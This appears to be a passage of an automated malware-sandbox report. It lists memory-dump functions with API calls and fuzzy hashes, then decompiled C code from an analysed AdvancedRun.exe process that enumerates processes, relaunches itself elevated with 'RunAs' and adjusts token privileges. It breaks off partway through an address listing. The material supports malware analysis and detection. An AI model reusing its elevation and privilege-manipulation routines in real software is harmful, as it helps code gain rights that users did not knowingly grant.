                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 024CDCCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: cba0e73e370f2ea4d04bc12c2c35cb1d527ff1f3264a663fb364b2f949b9bd0a
                                                                                                                    • Instruction ID: f0d2b12a9b4d111513414ba63961859afca4fa110fe53b3e43421997fbca97b3
                                                                                                                    • Opcode Fuzzy Hash: cba0e73e370f2ea4d04bc12c2c35cb1d527ff1f3264a663fb364b2f949b9bd0a
                                                                                                                    • Instruction Fuzzy Hash: D851CEB5D00309EFDF14CF99D984ADEBBB5BF48314F24852AE819AB210D774A985CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024C6CF9, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024C6CC6,?,?,?,?,?), ref: 024C6D87
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 1ee62880ecd52346173b5e2e9bc2afed69bf35d9ddc6834bceb1bc73c6d04a26
                                                                                                                    • Instruction ID: a84b53f7e322048ffc9885759bb7abcc1a5c341e423d3150ccebe0b974fe676f
                                                                                                                    • Opcode Fuzzy Hash: 1ee62880ecd52346173b5e2e9bc2afed69bf35d9ddc6834bceb1bc73c6d04a26
                                                                                                                    • Instruction Fuzzy Hash: D721E6B59012089FDB10CFA9D584ADEBFF8FB48314F14841AE918A7350D374A955CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024C5C6C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024C6CC6,?,?,?,?,?), ref: 024C6D87
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 6e201385135be56d890ea37b03cda90e874e378ac16b7def82dd0b5a9004b23d
                                                                                                                    • Instruction ID: 5c9225dad5f723f0df5f5be8a9dfd6d92ac817da99fb7cf5efce86c0bc05ccf2
                                                                                                                    • Opcode Fuzzy Hash: 6e201385135be56d890ea37b03cda90e874e378ac16b7def82dd0b5a9004b23d
                                                                                                                    • Instruction Fuzzy Hash: 8121E6B5900258EFDB10CF9AD984ADEBBF8FB48314F14841AE918A7350D374A954CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CAFF0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,024CBDC9,00000800,00000000,00000000), ref: 024CBFDA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1029625771-0
                                                                                                                    • Opcode ID: 7e9a7d81fa0ab5d89471438a2c3e9c39aa715ffd6dbaaa473d76b91fe160cbd7
                                                                                                                    • Instruction ID: 82a42c332187a939de483cabe567d27b6cabec433edc5abb538f242581cd26dd
                                                                                                                    • Opcode Fuzzy Hash: 7e9a7d81fa0ab5d89471438a2c3e9c39aa715ffd6dbaaa473d76b91fe160cbd7
                                                                                                                    • Instruction Fuzzy Hash: 6B1103B69042099FDB10CFAAD844BDEFBF8EB48314F14842EE419A7310C774A945CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CAF9C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,024CBB1B), ref: 024CBD4E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: e6b4f758174a84d2b4d9e62cd82127ef1469d0cb887327c69e0a77e81a23d6e0
                                                                                                                    • Instruction ID: dc8607c08ea06ec11df1166edc0d3872b5eee83af044d39473bf183866709228
                                                                                                                    • Opcode Fuzzy Hash: e6b4f758174a84d2b4d9e62cd82127ef1469d0cb887327c69e0a77e81a23d6e0
                                                                                                                    • Instruction Fuzzy Hash: DC11F0B59007498FDB10CF9AD544BDFBBF8EB48228F14842AD429A7350D778A546CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CB164, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,024CDDE8,?,?,?,?), ref: 024CDE5D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378638983-0
                                                                                                                    • Opcode ID: 6508ea6178cedcda18ae18197ff87598ba7311d1e7acc685524223fdcc9bdcb5
                                                                                                                    • Instruction ID: 777d53db78d39bfe41aa5cdb57c6af8b8f61a901bae3c08267961833b1eb93f6
                                                                                                                    • Opcode Fuzzy Hash: 6508ea6178cedcda18ae18197ff87598ba7311d1e7acc685524223fdcc9bdcb5
                                                                                                                    • Instruction Fuzzy Hash: 8E1122B5800608DFDB50CF99D588BDFBBF8EB48324F20845AE928A7300C374A944CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0086D3EC, Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.566325011.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e92c1bb5824419133f65e52e5701a2a13d50f35026fc6926b60f2c0002011b5e
                                                                                                                    • Instruction ID: 6c67d12bcd5c094e0bff4554fcacbea83e8f18c3a9679047c1d70f0f3a8f4192
                                                                                                                    • Opcode Fuzzy Hash: e92c1bb5824419133f65e52e5701a2a13d50f35026fc6926b60f2c0002011b5e
                                                                                                                    • Instruction Fuzzy Hash: 02214871A04304DFDB00DF50C9C0B66BB65FB98324F24C968E9098B246C736EC46C7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0086D3E7, Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.566325011.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24eb97f53dfc2f758aae7806af3b9c969fc9a1f1250e6544b53e35aad7901afb
                                                                                                                    • Instruction ID: 1daa293870e834218a1af145648013a21c36c70e18778a903738643e6b16c210
                                                                                                                    • Opcode Fuzzy Hash: 24eb97f53dfc2f758aae7806af3b9c969fc9a1f1250e6544b53e35aad7901afb
                                                                                                                    • Instruction Fuzzy Hash: 3D11D676904380DFDB11CF10D5C4B16BF72FB94320F24C5A9D8084B656C336D856CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0086D749, Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.566325011.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d00440ca58ee9a6da3b1ee85570eab935fe646e3af8263c54cda0ea537af2479
                                                                                                                    • Instruction ID: a5cf58a4508fb03303ecc7d512ee71b6686ded130f019a062263168980f0c421
                                                                                                                    • Opcode Fuzzy Hash: d00440ca58ee9a6da3b1ee85570eab935fe646e3af8263c54cda0ea537af2479
                                                                                                                    • Instruction Fuzzy Hash: CB01F771A083449AE7208A55CDC4BA7FBDCFF51328F19895AED089E286D3789844C6B2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0086D6E7, Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.566325011.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 993deb64018a5c5312c1ed35440694530651f5dd9bdbb2f7ccd43b853d8ec512
                                                                                                                    • Instruction ID: bc0535c809b60eba8b1423e44a160076a62259ef64d81b8e86e8a6c38fb61452
                                                                                                                    • Opcode Fuzzy Hash: 993deb64018a5c5312c1ed35440694530651f5dd9bdbb2f7ccd43b853d8ec512
                                                                                                                    • Instruction Fuzzy Hash: 2EF0F976600604AF97208F0AD985C27FBADFBC4774719C55AE8498B722C671EC42CFB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0086D748, Relevance: .0, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.566325011.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ffa57f221055a9b762062abe3ec02b41a2d242322aa5a069f0789de1652ffa91
                                                                                                                    • Instruction ID: 0061445c61336d5d8e2d9e037a8ad36418eccfe3a9117e5737f5b7e5afe2c1a6
                                                                                                                    • Opcode Fuzzy Hash: ffa57f221055a9b762062abe3ec02b41a2d242322aa5a069f0789de1652ffa91
                                                                                                                    • Instruction Fuzzy Hash: 13F062719043449EEB208A15DDC4B62FFA8EB51774F18C45AED089F296C3799844CAB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0086D6DC, Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.566325011.000000000086D000.00000040.00000001.sdmp, Offset: 0086D000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 98e81d5281bcff84ac606e4c7561f6cece8dbbad1e855e5ec9f443af2cf88875
                                                                                                                    • Instruction ID: db744025f97b8184af783425785c66d13855473a0d56100209c9d435eba70326
                                                                                                                    • Opcode Fuzzy Hash: 98e81d5281bcff84ac606e4c7561f6cece8dbbad1e855e5ec9f443af2cf88875
                                                                                                                    • Instruction Fuzzy Hash: 3CF0F975100644AFD725CF06C984C23BBB9FB897607198489A8599B762C671FC42CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 002A098B, Relevance: 4.2, Strings: 3, Instructions: 485COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.563446775.000000000029D000.00000002.00020000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.561750179.0000000000200000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000001.00000002.561804315.0000000000202000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000001.00000002.563336857.0000000000284000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000001.00000002.563939525.00000000002C0000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: f=$f=$f=
                                                                                                                    • API String ID: 0-1442601339
                                                                                                                    • Opcode ID: cbd064d57f306d8617a90e82082f32e9e20cc7d292c46c14e2543d0f58f90e88
                                                                                                                    • Instruction ID: ae6d070d564f83615269c20ea17450d4941ad6fab009054a06f1fdf6f551a6d0
                                                                                                                    • Opcode Fuzzy Hash: cbd064d57f306d8617a90e82082f32e9e20cc7d292c46c14e2543d0f58f90e88
                                                                                                                    • Instruction Fuzzy Hash: 1902B96148E3C29FC3139B348CA56C1BFB0AE1722475E4AEFD4C18E893D25D499BC762
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CC1F0, Relevance: .5, Instructions: 528COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5f2b8804d0da14ca53afcb23624f6e14382d4c40ef5ec28736081213b9065b5
                                                                                                                    • Instruction ID: a21f9483fc977d11b0d4a49382038a34d88afff58895415db1224263e76907ec
                                                                                                                    • Opcode Fuzzy Hash: a5f2b8804d0da14ca53afcb23624f6e14382d4c40ef5ec28736081213b9065b5
                                                                                                                    • Instruction Fuzzy Hash: 0E526AB2902706EFD712CF59E4CA1993BB1FB61328B904209D6555BA90DFBC6C4BCF48
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002A55BB, Relevance: .4, Instructions: 400COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.563446775.000000000029D000.00000002.00020000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.561750179.0000000000200000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000001.00000002.561804315.0000000000202000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000001.00000002.563336857.0000000000284000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000001.00000002.563939525.00000000002C0000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7f11829b9bcfea4a1a6653940a0519f99d76c99fc099d9a756e85cd8c57b2165
                                                                                                                    • Instruction ID: 7a2e8cd309bbd66d9119ec204848498fd15fd9bd553fba21f8f4ecf1c3642a6d
                                                                                                                    • Opcode Fuzzy Hash: 7f11829b9bcfea4a1a6653940a0519f99d76c99fc099d9a756e85cd8c57b2165
                                                                                                                    • Instruction Fuzzy Hash: DAF1CB6148F7C29FC7538B708C76191BFB1AE1322831E85EBC4C5CE4A3E65E585AC762
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Analysis Process: AdvancedRun.exe PID: 3336 Parent PID: 2244 AdvancedRun.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                                    0x00409609
                                                                                                                    0x0040960f
                                                                                                                    0x00409619
                                                                                                                    0x00409623
                                                                                                                    0x0040962e
                                                                                                                    0x00409633
                                                                                                                    0x00409640
                                                                                                                    0x0040964a
                                                                                                                    0x00409782
                                                                                                                    0x0040965a
                                                                                                                    0x0040965f
                                                                                                                    0x00409678
                                                                                                                    0x0040967e
                                                                                                                    0x00409681
                                                                                                                    0x00409685
                                                                                                                    0x00409688
                                                                                                                    0x004096b2
                                                                                                                    0x004096bf
                                                                                                                    0x004096c6
                                                                                                                    0x004096cb
                                                                                                                    0x004096da
                                                                                                                    0x004096e6
                                                                                                                    0x0040973b
                                                                                                                    0x00409747
                                                                                                                    0x0040975f
                                                                                                                    0x00409764
                                                                                                                    0x0040976a
                                                                                                                    0x00409770
                                                                                                                    0x00409773
                                                                                                                    0x0040977d
                                                                                                                    0x00000000
                                                                                                                    0x0040977d
                                                                                                                    0x004096ee
                                                                                                                    0x004096f5
                                                                                                                    0x004096fc
                                                                                                                    0x00409704
                                                                                                                    0x0040970c
                                                                                                                    0x0040971c
                                                                                                                    0x0040971c
                                                                                                                    0x00409704
                                                                                                                    0x00409721
                                                                                                                    0x00409728
                                                                                                                    0x00409739
                                                                                                                    0x00409739
                                                                                                                    0x00000000
                                                                                                                    0x00409728
                                                                                                                    0x00409693
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004096a5
                                                                                                                    0x004096a9
                                                                                                                    0x004096ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004096ac
                                                                                                                    0x004097a6

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                    • memset.MSVCRT ref: 0040962E
                                                                                                                    • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                    • memset.MSVCRT ref: 004096C6
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                    • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                    • API String ID: 239888749-1740548384
                                                                                                                    • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                    • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                    • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                    • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                                                    0x00401c31
                                                                                                                    0x00401c33
                                                                                                                    0x00401c48
                                                                                                                    0x00401c4f
                                                                                                                    0x00401c61
                                                                                                                    0x00401c68
                                                                                                                    0x00401c74
                                                                                                                    0x00401c79
                                                                                                                    0x00401c7a
                                                                                                                    0x00401c7b
                                                                                                                    0x00401c84
                                                                                                                    0x00401c89
                                                                                                                    0x00401c8e
                                                                                                                    0x00401c8f
                                                                                                                    0x00401c9b
                                                                                                                    0x00401ca6
                                                                                                                    0x00401caf
                                                                                                                    0x00401cb9
                                                                                                                    0x00401cc0
                                                                                                                    0x00401cc7
                                                                                                                    0x00401cce
                                                                                                                    0x00401cd5
                                                                                                                    0x00401cdd
                                                                                                                    0x00401ce0
                                                                                                                    0x00401d14
                                                                                                                    0x00401ce2
                                                                                                                    0x00401ce8
                                                                                                                    0x00401cf3
                                                                                                                    0x00401cf6
                                                                                                                    0x00401cfe
                                                                                                                    0x00401d09
                                                                                                                    0x00401d09
                                                                                                                    0x00401cfe
                                                                                                                    0x00401d1b

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                    • memset.MSVCRT ref: 00401C4F
                                                                                                                    • memset.MSVCRT ref: 00401C68
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                    • memset.MSVCRT ref: 00401C9B
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                    • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                    • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                    • API String ID: 903100921-3385179869
                                                                                                                    • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                    • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                    • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                    • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                    0x00408fc9
                                                                                                                    0x00408fd0
                                                                                                                    0x00408fe8
                                                                                                                    0x00000000
                                                                                                                    0x00408fea
                                                                                                                    0x00408ff4
                                                                                                                    0x00409001
                                                                                                                    0x00409003
                                                                                                                    0x0040900c
                                                                                                                    0x0040900e
                                                                                                                    0x00409010
                                                                                                                    0x0040901a
                                                                                                                    0x0040901a
